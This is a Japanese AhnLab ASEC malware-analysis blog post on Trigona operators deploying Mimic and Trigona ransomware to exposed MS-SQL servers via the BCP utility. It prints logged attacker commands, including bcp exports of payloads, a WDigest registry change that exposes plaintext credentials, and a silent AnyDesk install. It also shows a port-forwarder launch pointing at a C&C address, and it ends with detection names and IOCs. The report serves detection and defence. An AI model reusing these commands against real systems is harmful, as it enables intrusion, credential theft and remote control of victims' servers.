AhnLab SEcurity intelligence Center(ASEC)は、最近 Trigona ランサムウェアの攻撃者が Mimic ランサムウェアをインストールする新しい活動を確認した。今回確認された攻撃事例は、既存の事例と同じく MS-SQL サーバーを対象とし、マルウェアのインストールプロセスで MS-SQL サーバーの BCP(Bulk Copy Program) ユーティリティを悪用したという点が特徴である。
- Trigona ランサムウェア:少なくとも2022年6月から活動してきたと知られており、 [1](外部サイト、英語にて提供) 主に、MS-SQL サーバーを攻撃対象として最近までも活動を続けている。
- Mimic ランサムウェア:2022年6月に初めて発見され、 [2](外部サイト、英語にて提供) 2024年1月にはトルコ語を使用する攻撃者が不適切に管理されている MS-SQL サーバーを攻撃して Mimic ランサムウェアを攻撃した事例が公開された。[3](外部サイト、英語にて提供)
ASEC では、2024年1月の初めに BCP を活用して Mimic ランサムウェアをインストールする攻撃事例を初めて確認し、2024年1月中旬には同じ方式の攻撃事例で Mimic ランサムウェアの代わりに Trigona ランサムウェアがインストールされたことを確認した。Mimic ランサムウェアのランサムノートで使用された攻撃者のメールアドレスは、他の攻撃事例では確認されなかった。しかし、その後に確認された Trigona ランサムウェアのランサムノートでは、2023年の初めから Trigona ランサムウェア攻撃者が使用しているメールアドレスが使用された。[4](外部サイト、英語にて提供)
そのため、2024年1月中旬に確認された攻撃事例は、既存の Trigona 攻撃者によるものと思われ、2024年1月初めに確認された Mimic ランサムウェアの攻撃事例も同じ攻撃者によるものと見ている。これは、どちらの事例も不適切に管理されている MS-SQL サーバーを対象としている点と、マルウェアのインストールに BCP を使用したという点、そして攻撃に使用された様々な文字列、パス名が同じである点を根拠としている。以外にもそれぞれの攻撃事例から同じマルウェアが使用されたという点もある。
1. Trigona ランサムウェア
Trigona ランサムウェアは、Delphi 言語で開発され、ファイルを暗号化する際、RSA および AES 暗号化アルゴリズムを利用する。2023年2月には Arete 社のレポートで ManageEngine 脆弱性(CVE-2021-40539)を攻撃した事例が確認され、[5](外部サイト、英語にて提供) 2023年4月には当社の ASEC ブログで不適切に管理されている MS-SQL サーバーを対象とした攻撃事例が公開された。[6]
今回の攻撃事例も、2023年と同じく MS-SQL サーバーを対象としており、ランサムノートに保存された攻撃者のメールアドレスから今回確認された Trigona ランサムウェアも前の事例と同じ攻撃者によるものだという事が分かる。
- Email : farusbig@tutanota[.]com
- URL : hxxp://znuzuy4hkjacew5y2q7mo63hufhzzjtsr2bkjetxqjibk4ctfl7jghyd[.]onion/
2. Mimic ランサムウェア
Mimic ランサムウェアは、暗号化する対象となるファイルを探すプロセスで Everything というファイル検索プログラムを悪用することが特徴であるランサムウェアだ。攻撃者は、システムに存在するファイルを暗号化するタスクをもっと早くするために Everything ツールを悪用するものと推定される。その他にも、開発プロセスでソースコードが公開された Conti ランサムウェアの機能を借用したりもした。[7](外部サイト、英語に提供)
2023年1月に公開された TrendMicro レポートと、2024年1月に公開された Securonix レポートでそれぞれ確認された Mimic ランサムウェアと今回の攻撃に使用されたものは、外形的にはほぼ同じ形態である。マルウェアは、7z SFX 実行圧縮ファイルで製作されており、内部には「Everything64.dll」という名前の圧縮ファイルに実際のマルウェアと Everything ツールが暗号圧縮されている。マルウェアが実行されると、内部に含まれている 7z および「Everything64.dll」圧縮ファイルを解凍し、以下のようにパスワードを利用して圧縮を解凍する。
| > 7za.exe x -y -p58042791667523172 Everything64.dll > 7za.exe x -y -p624417568130113444 Everything64.dll |
最終的にインストールされたフォルダーには、Mimic ランサムウェアと Everything ツールの他にも Windows Defender を無効化する目的の Defender Control ツール(DC.exe)、そして Sysinternals の SDelete ツール(xdel.exe)が一緒に含まれている。
ランサムノートに書かれた攻撃者のメールアドレスは、2023年1月に公開された TrendMicro レポートと、2024年1月に公開された Securonix レポートの Mimic ランサムウェアが使用されたものとは異なり、他の攻撃事例でも確認されていない。代わりに、後述する様々な状況から Trigona ランサムウェア攻撃者が Mimic ランサムウェアを攻撃に一緒に使用しているものと推定している。
- Email : getmydata@list.ru
3. BCP を利用したマルウェアインストール
攻撃の対象は不適切に管理されている MS-SQL サーバー、すなわち外部に露出しており、アカウント情報を単純に設定し、総当たり攻撃や辞書攻撃に脆弱なシステムと推定される。これは、Trigona ランサムウェア攻撃者が過去からこのようなシステムを攻撃対象とするという点以外にも、LoveMiner、Remcos RAT などのマルウェアが、この攻撃プロセスの前と後にインストールされた感染ログが存在するという点から推定できる。
3.1. BCP を利用したファイル作成
BCP(Bulk Copy Program)ユーティリティの bcp.exe は、MS-SQL サーバーから大量の外部データをインポートしたりエクスポートすることに使用されるコマンドラインツールである。一般的に SQL サーバーのテーブルに保存された大量のデータをローカルのファイルで保存したり、ローカルに保存されたデータファイルを SQL サーバーのテーブルにエクスポートする際に使用される。
一般的に MS-SQL サーバーを攻撃する攻撃者は、マルウェアのダウンロード時に PowerShell コマンドを利用し、最近では SQL サーバーに含まれている PowerShell ツールである SQLPS を悪用したりもする。[8] しかし、今回の攻撃事例で攻撃者はデータベースにマルウェアを保存した後、BCP を利用してローカルにファイルで作成する方式を使用したと推定される。
攻撃者は、Trigona ランサムウェアバイナリが保存されたテーブル「uGnzBdZbsi」で、以下のようなコマンドを利用してローカルパスに Trigona ランサムウェアをエクスポートしたと推定される。「FODsOZKgAU.txt」はフォーマットファイルで、フォーマット情報が含まれているものと見られる。
以下は、攻撃に使用された様々なマルウェアおよびツールのエクスポートに使用された BCP コマンドである。
- Anydesk
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\AD.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt” - Port Forwarder マルウェア
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\4.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt” - Launcher マルウェア
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\pp2.exe” -T -f “C:\ProgramData\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\pp2.exe” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt” - Mimic ランサムウェア
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\K2K.txt” -T -f “C:\ProgramData\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\K3K.txt” -T -f “C:\users\%ASD%\FODsOZKgAU.txt” - Trigona ランサムウェア
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\build.txt” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt” - その他
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\kkk.bat” -T -f “C:\ProgramData\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\ProgramData\kur.bat” -T -f “C:\ProgramData\FODsOZKgAU.txt”
> bcp “select binaryTable from uGnzBdZbsi” queryout “C:\users\%ASD%\music\kkk.bat” -T -f “C:\users\%ASD%\music\FODsOZKgAU.txt”
3.2. 情報照会
BCP を利用してマルウェアを作成する前、すなわち攻撃に成功した後に攻撃者が何よりも先に実行するコマンドは、以下のように感染システムの情報を照会するコマンドである。攻撃者は、このコマンドを通して獲得した情報をベースに環境に適したマルウェアをインストールしたものと見られる。
| > hostname > whoami > wmic computersystem get domain > wmic computersystem get totalphysicalmemory |
3.3. 資格情報の窃取
Trigona ランサムウェアの攻撃者は、資格情報を窃取するために Mimikatz を使用していると知られている。[9](外部サイト、英語にて提供) [10](外部サイト、英語にて提供) 攻撃プロセスで Mimikatz のログは確認されなかったものの、攻撃者は WDigest セキュリティパッケージを利用した平文パスワードを獲得するために、UseLogonCredential レジストリキーを設定するコマンドを実行したりもした。
| > REG ADD “HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\wdigest” /v UseLogonCredential /t REG_DWORD /d 0x00000001 |
3.4. AnyDesk
その他にも感染システムを操作するため、Anydesk をインストールした。AnyDesk は遠隔操作ツールで、リモートデスクトップ、ファイル送信などの様々な機能を提供している。リモートデスクトップとは、RDP のように AnyDesk がインストールされている環境に遠隔でアクセスし、GUI 環境での操作をサポートする機能である。
Anydesk は、既存の Trigona ランサムウェア攻撃者だけでなく、大半の攻撃グループが悪用する代表的な遠隔操作ツールである。遠隔操作ツールは、在宅ワークや遠隔操作および管理のための正常な目的で使用する事例が多く、そのため AntiVirus 製品では一般的なマルウェアと違ってこのようなツールを単純に検知、遮断することに限界がある。攻撃者はこのような点を悪用し、初期侵入プロセスやラテラルムーブメントプロセスで攻撃対象のシステムを操作するため、RAT マルウェアの代わりに遠隔操作ツールをインストールしたりする。
| > %SystemDrive%\users\%ASD%\music\AD.exe –install C:\”Program Files (x86)”\ –silent > %SystemDrive%\”Program Files (x86)”\AnyDesk-ad_1514b2f9.exe –get-id” |
4. 攻撃に使用されたマルウェア解析
今回確認された攻撃事例では、BCP を悪用したという点以外にもセーフモードを活用した状況が確認されたという点も特徴である。Mimic ランサムウェアと Trigona ランサムウェア攻撃では、攻撃者が製作したものと見られる2つのマルウェアが追加で確認される。
一つは、自身をセーフモードでも動作できるサービスとして登録し、その後、サービスで動作する際に引数で伝達されたプログラムを実行させる機能を担当する Launcher マルウェアである。もう一つは、同様にセーフモードでも動作できるサービスとして登録した後、RDP を有効化して引数で伝達されたアドレスに RDP ポートに対するフォワーディングをサポートする Port Forwarder マルウェアである。
PDB 情報によると、攻撃者は Launcher マルウェアを「app2」、Port Forwarder マルウェアを「client」と名付けた。
システムの起動方式をセーフモードに設定するマルウェアやコマンドログは確認されなかったが、以下のように MS-SQL サーバープロセスがシステムを再起動するコマンドを実行したログは確認される。Launcher マルウェアが引数で伝達されたマルウェアを実行した後、セーフモードの起動オプションを無効化する点から状況上、攻撃者はマルウェアのインストール後、システムをセーフモードで再起動してランサムウェアを動作させたものと推定される。
| > shutdown -r -f -t 5 |
4.1. Launcher マルウェア
攻撃者は、以下のような引数を伝達し、Launcher マルウェアを実行させた。Launcher マルウェアは、実行時に「C:\windows\temp\LeVfeNXHoa」パスに自身をコピーする。その後、伝達された引数に応じて以下のタスクを実行するが、まず、一つ目の引数でサービスの名前を、そして二つ目の引数でコピーするファイルのパスを受け取る。二つ目の引数で受け取ったパスのファイルは、三つ目の引数で伝達されたパスに移動する。ちなみに、二つ目の引数で伝達されたファイルは Mimic ランサムウェアであった。
| > %ALLUSERSPROFILE%\pp2.exe 1111111 c:\programdata\K2K.txt c:\programdata\2K.EXE” |
Launcher マルウェアは、一つ目の引数で伝達された名前である「1111111」で自身をサービスに登録した後、セーフモードでも動作できるように追加のタスクを実行する。その後、サービスで動作すると、三つ目の引数で伝達されたパスのランサムウェアを実行する。ここまでのプロセスが終わると、セーフモード設定を無効化し、正常に起動されるようにする。
4.2. Port forwarder
攻撃者は、以下のような引数を伝達し、Port forwarder マルウェアを実行させた。ポートフォワーディングとは、特定のポートから受け取ったデータを別のポートに伝達する機能である。このマルウェアは、RDP サービス、すなわち3389番ポートに対するポートフォワーディングをサポートする。一般的に RDP 関連のポートフォワーディングツールは、外部から攻撃者が NAT 環境に直接アクセスできない点を克服するために使用される。
Port forwarder は、リバース接続方式で攻撃者のアドレスに接続した後、感染システムの RDP ポートに接続し、2つの通信を仲介する。そのため、攻撃者は NAT 環境で動作中のシステムであっても RDP 接続が可能となり、遠隔で感染システムを操作できるようになる。このように RDP を活用するため、マルウェアは以下のコマンドを実行し、追加で RDP サービスを有効化したりもする。
Port forwarder はインストールモードで実行時、自身を「C:\windows\temp\WindowsHostServicess.exe」パスにコピーし、「WindowsHostServicess」の名前でサービスに登録する。サービスは、上記の Launcher マルウェアと同じくセーフモードでも動作できるように設定する。
| > %SystemDrive%\users\%ASD%\music\4.exe –ip “2.57.149[.]233” –port “3366” –install |
Port forwarder は、5つの引数を持つが、3つはモードとしてそれぞれインストール、削除、そして実行機能をサポートする。実行モードでは、上記のサービスインストールプロセスなしに引数で伝達された C&C サーバーに接続してポートフォワーディングをサポートする。
| 引数 | 説明 |
|---|---|
| –install | インストールモード |
| –uninstall | 削除モード |
| –run | 実行モード |
| –ip | C&C サーバーの IP アドレス |
| –port | C&C サーバーの Port 番号 |
C&C サーバーに接続する前には、「C:\windows\temp\elZDk6geQ8」パスに OS 情報やユーザーおよびコンピューター名など、システムの基本的な情報を保存するが、最初に接続する際にこの情報を伝達する。
その後、C&C サーバーから受け取ったコマンドに応じて、ポートフォワーディングまたは自己削除コマンドを実行することができる。
| コマンド | 機能 |
|---|---|
| 0x8CC03FAF | C&C サーバーと RDP サービスに対するポートフォワーディング開始 |
| 0x0002C684 | 自己削除 |
5. 結論
最近、Trigona ランサムウェアの攻撃者が不適切に管理されている MS-SQL サーバーを対象に Mimic ランサムウェアおよび Trigona ランサムウェアをインストールしている。攻撃者が、ポートフォワーディング機能を担当するマルウェアを利用して感染システムに RDP で接続し、遠隔操作をしようとする試みも確認された。
Trigona のようなランサムウェア攻撃者は、収益のために感染システムを暗号化し、機密情報を窃取して脅迫する方式を使用している。その他にも、資格情報の窃取およびラテラルムーブメントのための様々な手法を試みるため、企業では単一システムだけでなく企業の内部ネットワーク全体が掌握され、企業の機密情報が窃取されてネットワーク内のシステムが暗号化される可能性がある。
MS-SQL サーバーを対象とする攻撃には代表的に、不適切にアカウント情報を管理しているシステムに対する総当たり攻撃(Brute Forcing)と辞書攻撃(Dictionary Attack)がある。管理者は、アカウントのパスワードを推測が困難な形式で設定し、定期的にパスワードを変更することで、総当たり攻撃や辞書攻撃からデータベースサーバーを保護しなければならない。
そして、V3 を最新バージョンにアップデートしてマルウェアへの感染を事前に遮断できるように注意を払わなければならない。また、外部に開放されていてアクセスが可能なデータベースサーバーに関してはファイアウォールのようなセキュリティ製品を利用し、外部の攻撃者からのアクセスを統制しなければならない。上記のような処置が先行されていない場合、攻撃者およびマルウェアによって感染状態が継続する場合がある。
ファイル検知
– Trojan/Win.Generic.R531737 (2022.10.27.00)
– HackTool/Win.DefenderControl.C5481630 (2023.09.06.00)
– Ransomware/Win.Mimic.C5543473 (2023.11.18.01)
– Ransomware/Win.Filecoder.C5561780 (2023.12.12.01)
– Trojan/Win.Agent.C5574264 (2024.01.14.03)
– Trojan/Win.Agent.C5574265 (2024.01.14.03)
振る舞い検知
– Malware/MDP.Minipulate.M71
– Persistence/MDP.AutoRun.M203
– DefenseEvasion/MDP.ModifyRegistry.M1234
– Ransom/MDP.Decoy.M1171
– CredentialAccess/MDP.Mimikatz.M4367
IOC
MD5
– a24bac9071fb6e07e13c52f65a093fce : Launcher (pp2.exe)
– a6e2722cff3abb214dc1437647964c57 : Launcher (pp2.exe)
– 3e26e778a4d28003686596f988942646 : Port Forwarder (4.exe)
– d6b4b1b6b0ec1799f57142798c5daf5b : Mimic Ransomware Dropper (K2K.exe)
– 6d44f8f3c1608e5958b40f9c6d7b6718 : Mimic Ransomware Dropper (K3K.exe)
– b3c8d81d6f8d19e5c07e1ca7932ed5bf : Mimic Ransomware (K2K.exe)
– a02157550bc9b491fd03cad394ccdfe7 : Mimic Ransomware (3usdaa.exe)
– c28b33f7365f9dc72cc291d13458f334 : Trigona Ransomware (build.txt)
– ac34ba84a5054cd701efad5dd14645c9 : Defender Control (DC.exe)
C&C
– 2.57.149[.]233:3366
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム「AhnLab TIP」サブスクリプションサービスを通して確認できる。
Categories:マルウェアの情報
[…] Lockis ランサムウェアや [1] Mimic ランサムウェア攻撃事例 [2] など、ASEC […]